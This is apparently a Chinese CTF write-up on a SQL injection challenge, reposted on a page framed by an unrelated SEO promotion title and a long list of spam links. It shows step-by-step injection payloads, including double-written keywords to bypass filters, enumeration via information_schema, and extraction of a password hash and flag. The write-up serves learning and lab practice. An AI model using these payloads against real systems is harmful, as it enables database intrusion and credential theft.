当前位置: 首页 > news >正文

网站宣传推广策划方案新闻软文发布平台

网站宣传推广策划方案,新闻软文发布平台,我想看黄牌,农业公司注册流程及费用打开题目 随便输入账号密码 根据报错信息可知这是单引号的字符型注入 那我们试试万能密码 1 or 11 页面报错 1 or 11 页面报错 而且根据报错内容显示是没有我们注入上去的or的 那我们就试试 1 order by 3 # 页面报错,根据报错显示页面过滤掉了or和by 那我们…

打开题目

随便输入账号密码

根据报错信息可知这是单引号的字符型注入

那我们试试万能密码

1' or '1'='1  页面报错

1  or '1'='1 页面报错

而且根据报错内容显示是没有我们注入上去的or的

那我们就试试

1' order by 3 #

页面报错,根据报错显示页面过滤掉了or和by

那我们试试

-1' union select 1,2,3,4 #

根据报错显示页面过滤了union和select

那我们就可以尝试双写绕过

1' ununionion seselectlect 1 #

报错显示有不同的列名

那就一个一个试吧

1' ununionion seselectlect 1,2,3#

页面正常

并且这里显示报错显示位为2,3

1' ununionion seselectlect 1,2,3,4#

页面报错

说明列名字段数为3

爆用户名和数据库名

-1’ ununionion seselectlect 1,user(),database()  #

这样我们就可以知道数据库用户名为root@localhost,数据库名为geek

-1' ununionion seselectlect 1,version(),@@version_compile_os #

这样我们就知道操作系统version_compile_os为Linux,数据库版本为10.3.18-MariaDB

总结一下就是

操作系统version_compile_os:Linux

数据库版本version():  10.3.18-MariaDB

数据库用户名user():  root@localhost

数据库名database():  geek

接下来我们查询geek数据库下的表名信息

-1' ununionion seselectlect 1,table_name,3 from information_schema.tables where table_shcema='geek' #

我们发现informmation,where都被过滤掉了

那我们对其进行双写

-1' uunionnion seselectlect 1,group_concat(table_name),3 frfromom inforformationmation_schema.tables whwhereere table_schema='geek' #

忘记页面是过滤or了

重新换个姿势

-1' ununionion seselectlect 1,group_concat(table_name),3 frfromom infoorrmation_schema.tables whwhereere table_schema='geek' #

说明表名有b4bsql,geekuser

爆破列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='geekuser' #

爆破数据

-1' uunionnion seselectlect 1,2,password frfromom geekuser  #

又忘记过滤or了

-1' uunionnion seselectlect 1,2,group_concat(passwoorrd) frfromom geekuser  #

这下爆出了password为2ac772d9987993a29b85958839d4e468

用户名为admin

id为1

尝试登录了一下用户名和密码,发现下面没有flag

那我们爆破b4bsql表下的列名

-1' ununionion seselectlect 1,group_concat(column_name),3 frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' #

发现下面也有三个列名

-1' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql #

查看页面源代码得到flag

知识点:

常见的sql注入绕过方式:SQL注入绕过入门总结篇 - FreeBuf网络安全行业门户

information_schema.schemata 获取所有数据库信息

表包含以下列:

  1. catalog_name:目录名称
  2. schema_name: 模式(数据库)的名称。
  3. default_character_set_name: 数据库编码。
  4. default_collation_name: 数据库排序规则

http://www.dinnco.com/news/47773.html

相关文章:

  • 网站验证码是如何做的搜索引擎优化心得体会
  • wordpress cad插件大全百度网络优化
  • 谷德设计网入口网站优化课程培训
  • wordpress 标签大全seo 服务
  • 建设银行车主卡网上交罚款网站沈阳关键词优化费用
  • 公司建了网站怎么做分录义乌最好的电商培训学校
  • 网站建设策划书总结软文营销广告
  • 怎样在织梦网站建设目录北京百度关键词优化
  • 建设京剧网站的意义什么叫百度竞价推广
  • 网站内链如何做优化资源网站排名优化seo
  • 查建筑材料的网站aso优化推广
  • 展示型网站一样做seo优化目前好的推广平台
  • 对战平台网站怎么建设网站关键词快速排名优化
  • 网站选项按钮湖北网站seo
  • 生态文明建设网站专题培训百度站长平台快速收录
  • 政府网站的ipv6建设方案关键词排名优化公司推荐
  • 专业的营销网站建设公司深圳网络整合营销公司
  • 南昌网站建设品牌微信营销的功能
  • 会员网站模板软文推广有哪些
  • 网站开发准备流程图旺道seo推广效果怎么样
  • 律师网站建设百度账号24小时人工电话
  • 网站建设及制作线上商城推广软文
  • 邯郸网站制作外包广州网站建设方案优化
  • wap网站实例seo排名app
  • 两个网站链接怎么做搜索引擎优化的内容
  • 什么是网站规划友情手机站
  • 东莞的网站建设公司关键词在线优化
  • 网站开发费用可否计入无形资产网站快速排名公司
  • 做360网站快速排名软件企业管理培训班哪个好
  • 网站首页的尺寸南通关键词优化平台